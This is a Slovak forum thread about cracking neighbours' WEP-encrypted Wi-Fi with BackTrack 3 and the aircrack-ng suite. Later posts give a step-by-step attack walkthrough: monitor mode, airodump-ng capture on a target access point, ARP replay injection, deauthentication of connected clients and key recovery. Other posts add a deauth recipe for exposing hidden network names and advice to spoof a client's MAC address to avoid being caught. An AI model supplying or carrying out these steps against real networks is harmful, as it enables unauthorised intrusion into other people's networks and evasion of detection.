prelomenie WEP s backtrackom3

O internete a sieťach, problémoch, nastaveniach...
aaaa
Light Star
Light Star
Používateľov profilový obrázok
Príspevky: 241
Registrovaný: 23 okt 2005, 13:22

Príspevok od používateľa aaaa »

ja som nevedel ze som mal zapnuty torrent snifovat sa da pekne s cainom. ten wireshran zahodim do kosa ten bt je omnoho lepsi
Dark_Mixx
Amateur
Amateur
Príspevky: 32
Registrovaný: 23 apr 2009, 20:21

Príspevok od používateľa Dark_Mixx »

chalani hodi mi do posty niekto linky na najnovsi backtrack?
Ako som si vzdy myslel je to zadara distribucia linuxu na lamanie wifi sieti, ale netusil som, ze niekto chce za nu peniazky...
Poprosim vas budem velmi vdacny. :twisted:
Andrew007
Guru wannabe
Guru wannabe
Používateľov profilový obrázok
Príspevky: 2055
Registrovaný: 01 jan 2008, 12:20
Bydlisko: SC:\
Kontaktovať používateľa:

Príspevok od používateľa Andrew007 »

Dark_Mixx napísal:chalani hodi mi do posty niekto linky na najnovsi backtrack?
Ako som si vzdy myslel je to zadara distribucia linuxu na lamanie wifi sieti, ale netusil som, ze niekto chce za nu peniazky...
Poprosim vas budem velmi vdacny. :twisted:
Keby si aspon nalistoval jednu stranu dozadu... :roll:

http://www.remote-exploit.org/backtrack_download.html
hojko
Site Admin
Site Admin
Používateľov profilový obrázok
Príspevky: 38514
Registrovaný: 24 apr 2004, 18:29
Bydlisko: Európa
Kontaktovať používateľa:

Príspevok od používateľa hojko »

Andrew007
Guru wannabe
Guru wannabe
Používateľov profilový obrázok
Príspevky: 2055
Registrovaný: 01 jan 2008, 12:20
Bydlisko: SC:\
Kontaktovať používateľa:

Príspevok od používateľa Andrew007 »

WEP uz dneska je pre 10-rocnych, WPA (TKIP,AES) kto vie prelamat len s jednim kvalitnim suborom (wordlistom) alebo s vygenerovanimy "hashmi" co asi neexistuje je master :)

btw. oplati sa zainvestovat do Cuda :wink:
trackback
Novice
Novice
Príspevky: 1
Registrovaný: 18 sep 2009, 16:58

How to

Príspevok od používateľa trackback »

Hovoriť o ne-podpore sieťovej karty bez toho aby ste sa bavili o chipsete je .. Kto chápe ten chápe, kto nie nech sa príde pozrieť ako sa veci robia - airdump.cz
ehm123
King
King
Príspevky: 1658
Registrovaný: 27 feb 2006, 6:45
Bydlisko: PD / Praha

Príspevok od používateľa ehm123 »

S pristihnutim by problem nemal byt, ale ak je doticny sikovny, tak moze odchytavat packety a to by bolo (aspon pre mna horsie) ako opletacky s fizlami. Ked uz tak pouzivat sifrovanu vpn
MakeFake
Spammer
Spammer
Používateľov profilový obrázok
Príspevky: 978
Registrovaný: 11 aug 2008, 13:33
Bydlisko: EU
Kontaktovať používateľa:

Príspevok od používateľa MakeFake »

Stiahni si WifiSlax. Je to linuxova distribucia prisposobena na hackovanie wifi, obsahuje to vsetky nastroje vratane ovladacov.
hrban
Addict
Addict
Používateľov profilový obrázok
Príspevky: 4950
Registrovaný: 14 júl 2005, 7:44
Bydlisko: Almere
Kontaktovať používateľa:

Príspevok od používateľa hrban »

mňa by len zaujímalo či sa dá zistiť skryté essid a ak áno tak postup ako
Andrew007
Guru wannabe
Guru wannabe
Používateľov profilový obrázok
Príspevky: 2055
Registrovaný: 01 jan 2008, 12:20
Bydlisko: SC:\
Kontaktovať používateľa:

Príspevok od používateľa Andrew007 »

hrban napísal:mňa by len zaujímalo či sa dá zistiť skryté essid a ak áno tak postup ako
Samozrejme, myslim si ze sa do toho rozumies tak tu mas rovno postup :arrow:

Kód: Vybrať všetko

Detekovane AP ma slusny signal, vidite i asociovane klienty ale AP nevysila ESSID.

Použijeme Aireplay prepínač -0 (Deuath). Ten odpojí dle konfigurace příkazu jednoho nebo všechny klienty na AP.

Deauth to broadcast (všesměr)

aireplay -0 5 -a 00:60:BX:xx:xx:xx wlan0

Deauth s definovanou MAC klienta.

aireplay -0 5 -a 00:60:BX:xx:xx:xx -c 00:60:BY:xx:xx:xx wlan0

Aireplay-ng zapis:

aireplay-ng -0 5 -a 00:60:BX:xx:xx:xx -c 00:60:BY:xx:xx:xx wlan0

Konzole zobrazí:


Deauth odpoji klienta (-y) asociovaneho na AP a v první konzole (Airodump) se objeví jméno AP (ESSID). Jak to? Klient u asociace na AP ESSID vyšle a Airodump ho zachytí. Pokuď útok funguje je to první prověrka Packet injection (je funkcni). Jako bonus máme jméno AP.


Vysvětlivky:
5 v příkazu znamená počet deauth paketu, ktere odešlete
-0 (nebo taky přepínač nula) je jeden z útoku (Deauth) Aireplay.
:)
IMI
Addict
Addict
Používateľov profilový obrázok
Príspevky: 3213
Registrovaný: 28 jan 2005, 17:39
Bydlisko: KE
Kontaktovať používateľa:

Príspevok od používateľa IMI »

Zdravim,
kedze mam v mojom okoli vela ludi, kt. maju sifrovanie WEP tak by som chcel cracknut nejaku wifi siet na WIN XP ak by sa to dalo , mam tento adapter http://www.focus.sk/zoom.asp?img=IMAGES ... popis=6209 a neviem k nemu najst nejaky vhodny soft , kt. by s nim spolupracoval.Skuste mi nejako pomoct . Dik :)
hrban
Addict
Addict
Používateľov profilový obrázok
Príspevky: 4950
Registrovaný: 14 júl 2005, 7:44
Bydlisko: Almere
Kontaktovať používateľa:

Príspevok od používateľa hrban »

Ovislink má celkom dobré routre dúfajme že to bude aj v prípade usb problém by mohol byť v OS radšej si stiahni Backtrack3 a daj si ho na CD/DVD mrkni sa na túto tému a tam je postup ako do 5-10 min crackneš akékoľvek WEP heslo
IMI
Addict
Addict
Používateľov profilový obrázok
Príspevky: 3213
Registrovaný: 28 jan 2005, 17:39
Bydlisko: KE
Kontaktovať používateľa:

Príspevok od používateľa IMI »

S linuxom niesom velmi kamarat tak preto sa pytam ci nieje nieco na win :)

//autoeditácia príspevku ( 14 Nov 2009, 21:18 )
No nic, skusam linux, stahujem ubuntu aj backtrack3 z lamiek, ked toto budem mat, mam to nacitat vo windowse a co dalej ? lebo z tych navodov na prvej stranke velmi nechapem...
hrban
Addict
Addict
Používateľov profilový obrázok
Príspevky: 4950
Registrovaný: 14 júl 2005, 7:44
Bydlisko: Almere
Kontaktovať používateľa:

Príspevok od používateľa hrban »

ak sa rozhodneš pre ubuntu a rozbeháš tam to wifi napíš mi ja ti poradím ako ďalej tiež som stiahol ubuntu 8.10 a s tým robím až doteraz samozrejme už je to tak upravené distro že by ho nik nepoznal :)
ráno asi napíšem komplet návod ako sa dá využiť aircrack-ng spolu s wireshark-om
ubuntu a tuším aj backtrack sa dá spustiť aj priamo z cd len to napáliš a nastavíš boot z CD-ROM-ky a môžeš pracovať
IMI
Addict
Addict
Používateľov profilový obrázok
Príspevky: 3213
Registrovaný: 28 jan 2005, 17:39
Bydlisko: KE
Kontaktovať používateľa:

Príspevok od používateľa IMI »

ubuntu mam stiahnut aj nainstalovane ak vlozim do usb adapter najde nejake wifi siete, dalej co si mam stiahnut a co mam dalej robit ?
hrban
Addict
Addict
Používateľov profilový obrázok
Príspevky: 4950
Registrovaný: 14 júl 2005, 7:44
Bydlisko: Almere
Kontaktovať používateľa:

Príspevok od používateľa hrban »

daj konzolu a príkaz

Kód: Vybrať všetko

sudo apt-get install aircrack-ng
potom si naštuduj toto

Kód: Vybrať všetko

http://www.aircrack-ng.org/doku.php?id=simple_wep_crack
riaď sa tým je to tam dobre popísné ráno z toho spravím výcuc
IMI
Addict
Addict
Používateľov profilový obrázok
Príspevky: 3213
Registrovaný: 28 jan 2005, 17:39
Bydlisko: KE
Kontaktovať používateľa:

Príspevok od používateľa IMI »

Ok, zajtra sa na to pozriem, a skus mi spravit ten hlavny vycuc. diky :)
hrban
Addict
Addict
Používateľov profilový obrázok
Príspevky: 4950
Registrovaný: 14 júl 2005, 7:44
Bydlisko: Almere
Kontaktovať používateľa:

Príspevok od používateľa hrban »

čiže najskôr zisti interface name
príkaz

Kód: Vybrať všetko

sudo iwlist scan
vyhodí ti niečo ako

Kód: Vybrať všetko

ath0 no scan results
eth0 no scan results....
wlan0/wifi0 (u teba asi rausb0)
a názvy sietí s kompletnými info o sieti
kanál na ktorom vysiela a BSSID
daľej spusti monitor mode

Kód: Vybrať všetko

sudo airmon-ng start wifi0
nemusí tam byť na konci wifi0 malo by tam byť to čo ti oscanovalo tie siete
nabehne niečo takéto

Kód: Vybrať všetko

 Interface       Chipset         Driver
 
 wifi0           Atheros          ath5k
 ath0            Atheros          ath5k (parent: wifi0) (monitor mode enabled on mon0)
monitor mode máš už spustený na interface mon0 možno u teba sa to bude volať inak
spustíme odchytávanie packetov

Kód: Vybrať všetko

sudo airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output mon0
niečo takéto

Kód: Vybrať všetko

 CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 
                                                                                                              
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                            
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy                           
                                                                                                            
 BSSID              STATION            PWR  Lost  Packets  Probes                                             
                                                                                                            
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782  
tu sa ti zobrazia aj klienti pripojený na AP resp ich MAC ktorá ti bude treba kvôli tvojej bezpečnosti vyber si jednu z nich a zmeň si ju (zmenu MAC popíšem neskôr)
-c 9 je kanám na ktorom vysiela AP, ktoré chceš cracknúť
--bssid je MAC adresa AP
-w output je názov súboru do ktorého sa ti budú ukladať odchytené pakety
otvor druhé terminálové okno a pusti príkaz

Kód: Vybrať všetko

sudo aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0
kde
-3 znamená zachytávanie ARP packetov a packet injection
-b 00:14:6C:7E:40:80 je MAC adresa AP
-h 00:0F:B5:88:AC:82 je MAC adresa nejakého clienta
zobrazí sa niečo takéto

Kód: Vybrať všetko

Read 629399 packets (got 0 ARP requests), sent 0 packets...
otvor tretie terminálové okno

Kód: Vybrať všetko

sudo aireplay-ng -0  5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:88:AC:82 mon0
týmto deautentifikuješ clienta on sa automaticky pripojí a ty tím získaš ARP packet potrebný pre packet injection
ak nezachitíš ARP packet počkaj cca 1 min a zopakuj (ARP packet by si mal zachytiť v druhom okne)
otvor štvrté okno a už len pusti aircrack a on už urobí všetko za teba

Kód: Vybrať všetko

sudo aircrack-ng cesta k súboru output.cab 
zmena MAC adresy

Kód: Vybrať všetko

sudo ifconfig rausb0 down
sudo ifconfig rausb0 hw ether 00:11:22:33:44:55
sudo ifconfig rausb0 up
00:11:22:33:44:55 si daj nejakú z tých klientských MAC adries
IMI
Addict
Addict
Používateľov profilový obrázok
Príspevky: 3213
Registrovaný: 28 jan 2005, 17:39
Bydlisko: KE
Kontaktovať používateľa:

Príspevok od používateľa IMI »

Ok, dik ale ty mi pises uz asi rozsireny navod, ja mam nainstalovane Ubuntu a nic viac zatial, spustim terminal a zadam sudo iwlist scan a pise mi interface doesnt support scanning.. co mam este na ubuntu nainstalovat ? a na linuxe neviem rozbehat internet, nie wifi ale klasickku kablovku... diky za kazdu radu :)

btw:backtrack mam stiahnuty aj napaleny na cd.. mam ho vlozit do mechaniky restartnut a dat tei prikazy co pises ?
Andrew007
Guru wannabe
Guru wannabe
Používateľov profilový obrázok
Príspevky: 2055
Registrovaný: 01 jan 2008, 12:20
Bydlisko: SC:\
Kontaktovať používateľa:

Príspevok od používateľa Andrew007 »

Nabootuj BT, nastartuj, prihlas sa, otvor si terminal (prikazovy riadok) a pis uz zhora uvedene veci..

btw. mozno ze budes mat hodnoty odlisne napr. meno sietovky ako napr, wifi0, rausb0, ath0...atd

:)
Napísať odpoveď